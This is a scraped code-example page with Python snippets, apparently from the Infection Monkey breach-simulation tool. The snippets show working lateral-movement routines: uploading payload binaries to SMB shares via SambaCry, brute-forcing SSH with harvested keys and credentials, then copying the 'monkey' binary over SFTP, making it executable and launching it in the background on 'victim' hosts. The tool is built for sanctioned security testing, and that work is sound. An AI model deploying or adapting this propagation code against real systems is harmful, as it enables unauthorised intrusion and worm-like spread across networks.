예제 #1
0
파일: sambacry.py 프로젝트: rakhif/monkey
    def upload_module(self, smb_client, share):
        """
        Uploads the module and all relevant files to server
        :param smb_client:          smb client object
        :param share:               share name
        """
        tree_id = smb_client.connectTree(share)

        with self.get_monkey_commandline_file(self._config.dropper_target_path_linux) as monkey_commandline_file:
            smb_client.putFile(share, "\\%s" % self.SAMBACRY_COMMANDLINE_FILENAME, monkey_commandline_file.read)

        with self.get_monkey_runner_bin_file(True) as monkey_runner_bin_file:
            smb_client.putFile(share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_32, monkey_runner_bin_file.read)

        with self.get_monkey_runner_bin_file(False) as monkey_runner_bin_file:
            smb_client.putFile(share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_64, monkey_runner_bin_file.read)

        monkey_bin_32_src_path = get_target_monkey_by_os(False, True)
        monkey_bin_64_src_path = get_target_monkey_by_os(False, False)

        with monkeyfs.open(monkey_bin_32_src_path, "rb") as monkey_bin_file:
            smb_client.putFile(share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_32, monkey_bin_file.read)

        with monkeyfs.open(monkey_bin_64_src_path, "rb") as monkey_bin_file:
            smb_client.putFile(share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_64, monkey_bin_file.read)
        T1105Telem(ScanStatus.USED,
                   get_interface_to_target(self.host.ip_addr),
                   self.host.ip_addr,
                   monkey_bin_64_src_path).send()
        smb_client.disconnectTree(tree_id)
예제 #2
0
    def download_pba_file(dst_dir, filename):
        """
        Handles post breach action file download
        :param dst_dir: Destination directory
        :param filename: Filename
        :return: True if successful, false otherwise
        """

        pba_file_contents = ControlClient.get_pba_file(filename)

        status = None
        if not pba_file_contents or not pba_file_contents.content:
            logger.error("Island didn't respond with post breach file.")
            status = ScanStatus.SCANNED

        if not status:
            status = ScanStatus.USED

        T1105Telem(
            status,
            WormConfiguration.current_server.split(":")[0],
            get_interface_to_target(
                WormConfiguration.current_server.split(":")[0]),
            filename,
        ).send()

        if status == ScanStatus.SCANNED:
            return False

        try:
            with open(os.path.join(dst_dir, filename),
                      "wb") as written_PBA_file:
                written_PBA_file.write(pba_file_contents.content)
            return True
        except IOError as e:
            logger.error(
                "Can not upload post breach file to target machine: %s" % e)
            return False
예제 #3
0
    def _exploit_host(self):

        port = SSH_PORT
        # if ssh banner found on different port, use that port.
        for servkey, servdata in list(self.host.services.items()):
            if servdata.get("name") == "ssh" and servkey.startswith("tcp-"):
                port = int(servkey.replace("tcp-", ""))

        is_open, _ = check_tcp_port(self.host.ip_addr, port)
        if not is_open:
            logger.info("SSH port is closed on %r, skipping", self.host)
            return False

        try:
            ssh = self.exploit_with_ssh_keys(port)
        except FailedExploitationError:
            try:
                ssh = self.exploit_with_login_creds(port)
            except FailedExploitationError:
                logger.debug("Exploiter SSHExploiter is giving up...")
                return False

        if not self.host.os.get("type"):
            try:
                _, stdout, _ = ssh.exec_command("uname -o")
                uname_os = stdout.read().lower().strip().decode()
                if "linux" in uname_os:
                    self.host.os["type"] = "linux"
                else:
                    logger.info("SSH Skipping unknown os: %s", uname_os)
                    return False
            except Exception as exc:
                logger.debug("Error running uname os command on victim %r: (%s)", self.host, exc)
                return False

        if not self.host.os.get("machine"):
            try:
                _, stdout, _ = ssh.exec_command("uname -m")
                uname_machine = stdout.read().lower().strip().decode()
                if "" != uname_machine:
                    self.host.os["machine"] = uname_machine
            except Exception as exc:
                logger.debug(
                    "Error running uname machine command on victim %r: (%s)", self.host, exc
                )

        if self.skip_exist:
            _, stdout, stderr = ssh.exec_command(
                "head -c 1 %s" % self._config.dropper_target_path_linux
            )
            stdout_res = stdout.read().strip()
            if stdout_res:
                # file exists
                logger.info(
                    "Host %s was already infected under the current configuration, "
                    "done" % self.host
                )
                return True  # return already infected

        src_path = get_target_monkey(self.host)

        if not src_path:
            logger.info("Can't find suitable monkey executable for host %r", self.host)
            return False

        try:
            ftp = ssh.open_sftp()

            self._update_timestamp = time.time()
            with monkeyfs.open(src_path) as file_obj:
                ftp.putfo(
                    file_obj,
                    self._config.dropper_target_path_linux,
                    file_size=monkeyfs.getsize(src_path),
                    callback=self.log_transfer,
                )
                ftp.chmod(self._config.dropper_target_path_linux, 0o777)
                status = ScanStatus.USED
                T1222Telem(
                    ScanStatus.USED,
                    "chmod 0777 %s" % self._config.dropper_target_path_linux,
                    self.host,
                ).send()
            ftp.close()
        except Exception as exc:
            logger.debug("Error uploading file into victim %r: (%s)", self.host, exc)
            status = ScanStatus.SCANNED

        T1105Telem(
            status, get_interface_to_target(self.host.ip_addr), self.host.ip_addr, src_path
        ).send()
        if status == ScanStatus.SCANNED:
            return False

        try:
            cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG)
            cmdline += build_monkey_commandline(
                self.host, get_monkey_depth() - 1, vulnerable_port=SSH_PORT
            )
            cmdline += " > /dev/null 2>&1 &"
            ssh.exec_command(cmdline)

            logger.info(
                "Executed monkey '%s' on remote victim %r (cmdline=%r)",
                self._config.dropper_target_path_linux,
                self.host,
                cmdline,
            )

            ssh.close()
            self.add_executed_cmd(cmdline)
            return True

        except Exception as exc:
            logger.debug("Error running monkey on victim %r: (%s)", self.host, exc)
            return False
예제 #4
0
    def copy_file(host,
                  src_path,
                  dst_path,
                  username,
                  password,
                  lm_hash='',
                  ntlm_hash='',
                  timeout=60):
        assert monkeyfs.isfile(
            src_path), "Source file to copy (%s) is missing" % (src_path, )
        config = infection_monkey.config.WormConfiguration
        src_file_size = monkeyfs.getsize(src_path)

        smb, dialect = SmbTools.new_smb_connection(host, username, password,
                                                   lm_hash, ntlm_hash, timeout)
        if not smb:
            return None

        # skip guest users
        if smb.isGuestSession() > 0:
            LOG.debug(
                "Connection to %r granted guest privileges with user: %s, password (SHA-512): '%s',"
                " LM hash (SHA-512): %s, NTLM hash (SHA-512): %s", host,
                username, Configuration.hash_sensitive_data(password),
                Configuration.hash_sensitive_data(lm_hash),
                Configuration.hash_sensitive_data(ntlm_hash))

            try:
                smb.logoff()
            except:
                pass

            return None

        try:
            resp = SmbTools.execute_rpc_call(smb, "hNetrServerGetInfo", 102)
        except Exception as exc:
            LOG.debug("Error requesting server info from %r over SMB: %s",
                      host, exc)
            return None

        info = {
            'major_version':
            resp['InfoStruct']['ServerInfo102']['sv102_version_major'],
            'minor_version':
            resp['InfoStruct']['ServerInfo102']['sv102_version_minor'],
            'server_name':
            resp['InfoStruct']['ServerInfo102']['sv102_name'].strip("\0 "),
            'server_comment':
            resp['InfoStruct']['ServerInfo102']['sv102_comment'].strip("\0 "),
            'server_user_path':
            resp['InfoStruct']['ServerInfo102']['sv102_userpath'].strip("\0 "),
            'simultaneous_users':
            resp['InfoStruct']['ServerInfo102']['sv102_users']
        }

        LOG.debug("Connected to %r using %s:\n%s", host, dialect,
                  pprint.pformat(info))

        try:
            resp = SmbTools.execute_rpc_call(smb, "hNetrShareEnum", 2)
        except Exception as exc:
            LOG.debug("Error enumerating server shares from %r over SMB: %s",
                      host, exc)
            return None

        resp = resp['InfoStruct']['ShareInfo']['Level2']['Buffer']

        high_priority_shares = ()
        low_priority_shares = ()
        file_name = ntpath.split(dst_path)[-1]

        for i in range(len(resp)):
            share_name = resp[i]['shi2_netname'].strip("\0 ")
            share_path = resp[i]['shi2_path'].strip("\0 ")
            current_uses = resp[i]['shi2_current_uses']
            max_uses = resp[i]['shi2_max_uses']

            if current_uses >= max_uses:
                LOG.debug(
                    "Skipping share '%s' on victim %r because max uses is exceeded",
                    share_name, host)
                continue
            elif not share_path:
                LOG.debug(
                    "Skipping share '%s' on victim %r because share path is invalid",
                    share_name, host)
                continue

            share_info = {'share_name': share_name, 'share_path': share_path}

            if dst_path.lower().startswith(share_path.lower()):
                high_priority_shares += ((ntpath.sep +
                                          dst_path[len(share_path):],
                                          share_info), )

            low_priority_shares += ((ntpath.sep + file_name, share_info), )

        shares = high_priority_shares + low_priority_shares

        file_uploaded = False
        for remote_path, share in shares:
            share_name = share['share_name']
            share_path = share['share_path']

            if not smb:
                smb, _ = SmbTools.new_smb_connection(host, username, password,
                                                     lm_hash, ntlm_hash,
                                                     timeout)
                if not smb:
                    return None

            try:
                tid = smb.connectTree(share_name)
            except Exception as exc:
                LOG.debug(
                    "Error connecting tree to share '%s' on victim %r: %s",
                    share_name, host, exc)
                continue

            LOG.debug(
                "Trying to copy monkey file to share '%s' [%s + %s] on victim %r",
                share_name,
                share_path,
                remote_path,
                host.ip_addr[0],
            )

            remote_full_path = ntpath.join(share_path,
                                           remote_path.strip(ntpath.sep))

            # check if file is found on destination
            if config.skip_exploit_if_file_exist:
                try:
                    file_info = smb.listPath(share_name, remote_path)
                    if file_info:
                        if src_file_size == file_info[0].get_filesize():
                            LOG.debug(
                                "Remote monkey file is same as source, skipping copy"
                            )
                            return remote_full_path

                        LOG.debug(
                            "Remote monkey file is found but different, moving along with attack"
                        )
                except:
                    pass  # file isn't found on remote victim, moving on

            try:
                with monkeyfs.open(src_path, 'rb') as source_file:
                    # make sure of the timeout
                    smb.setTimeout(timeout)
                    smb.putFile(share_name, remote_path, source_file.read)

                file_uploaded = True
                T1105Telem(ScanStatus.USED,
                           get_interface_to_target(host.ip_addr), host.ip_addr,
                           dst_path).send()
                LOG.info(
                    "Copied monkey file '%s' to remote share '%s' [%s] on victim %r",
                    src_path, share_name, share_path, host)

                break
            except Exception as exc:
                LOG.debug(
                    "Error uploading monkey to share '%s' on victim %r: %s",
                    share_name, host, exc)
                T1105Telem(ScanStatus.SCANNED,
                           get_interface_to_target(host.ip_addr), host.ip_addr,
                           dst_path).send()
                continue
            finally:
                try:
                    smb.logoff()
                except:
                    pass

                smb = None

        if not file_uploaded:
            LOG.debug(
                "Couldn't find a writable share for exploiting victim %r with "
                "username: %s, password (SHA-512): '%s', LM hash (SHA-512): %s, NTLM hash (SHA-512): %s",
                host, username, Configuration.hash_sensitive_data(password),
                Configuration.hash_sensitive_data(lm_hash),
                Configuration.hash_sensitive_data(ntlm_hash))
            return None

        return remote_full_path
예제 #5
0
    def _exploit_host(self):
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.WarningPolicy())

        port = SSH_PORT
        # if ssh banner found on different port, use that port.
        for servkey, servdata in self.host.services.items():
            if servdata.get('name') == 'ssh' and servkey.startswith('tcp-'):
                port = int(servkey.replace('tcp-', ''))

        is_open, _ = check_tcp_port(self.host.ip_addr, port)
        if not is_open:
            LOG.info("SSH port is closed on %r, skipping", self.host)
            return False

        # Check for possible ssh exploits
        exploited = self.exploit_with_ssh_keys(port, ssh)
        if not exploited:
            exploited = self.exploit_with_login_creds(port, ssh)

        if not exploited:
            LOG.debug("Exploiter SSHExploiter is giving up...")
            return False

        if not self.host.os.get('type'):
            try:
                _, stdout, _ = ssh.exec_command('uname -o')
                uname_os = stdout.read().lower().strip()
                if 'linux' in uname_os:
                    self.host.os['type'] = 'linux'
                else:
                    LOG.info("SSH Skipping unknown os: %s", uname_os)
                    return False
            except Exception as exc:
                LOG.debug("Error running uname os commad on victim %r: (%s)",
                          self.host, exc)
                return False

        if not self.host.os.get('machine'):
            try:
                _, stdout, _ = ssh.exec_command('uname -m')
                uname_machine = stdout.read().lower().strip()
                if '' != uname_machine:
                    self.host.os['machine'] = uname_machine
            except Exception as exc:
                LOG.debug(
                    "Error running uname machine commad on victim %r: (%s)",
                    self.host, exc)

        if self.skip_exist:
            _, stdout, stderr = ssh.exec_command(
                "head -c 1 %s" % self._config.dropper_target_path_linux)
            stdout_res = stdout.read().strip()
            if stdout_res:
                # file exists
                LOG.info(
                    "Host %s was already infected under the current configuration, done"
                    % self.host)
                return True  # return already infected

        src_path = get_target_monkey(self.host)

        if not src_path:
            LOG.info("Can't find suitable monkey executable for host %r",
                     self.host)
            return False

        try:
            ftp = ssh.open_sftp()

            self._update_timestamp = time.time()
            with monkeyfs.open(src_path) as file_obj:
                ftp.putfo(file_obj,
                          self._config.dropper_target_path_linux,
                          file_size=monkeyfs.getsize(src_path),
                          callback=self.log_transfer)
                ftp.chmod(self._config.dropper_target_path_linux, 0o777)
                status = ScanStatus.USED
                T1222Telem(
                    ScanStatus.USED,
                    "chmod 0777 %s" % self._config.dropper_target_path_linux,
                    self.host).send()
            ftp.close()
        except Exception as exc:
            LOG.debug("Error uploading file into victim %r: (%s)", self.host,
                      exc)
            status = ScanStatus.SCANNED

        T1105Telem(status, get_interface_to_target(self.host.ip_addr),
                   self.host.ip_addr, src_path).send()
        if status == ScanStatus.SCANNED:
            return False

        try:
            cmdline = "%s %s" % (self._config.dropper_target_path_linux,
                                 MONKEY_ARG)
            cmdline += build_monkey_commandline(self.host,
                                                get_monkey_depth() - 1)
            cmdline += "&"
            ssh.exec_command(cmdline)

            LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
                     self._config.dropper_target_path_linux, self.host,
                     cmdline)

            ssh.close()
            self.add_executed_cmd(cmdline)
            return True

        except Exception as exc:
            LOG.debug("Error running monkey on victim %r: (%s)", self.host,
                      exc)
            return False
예제 #6
0
def T1105_telem_test_instance():
    return T1105Telem(STATUS, SRC_IP, DST_IP, FILENAME)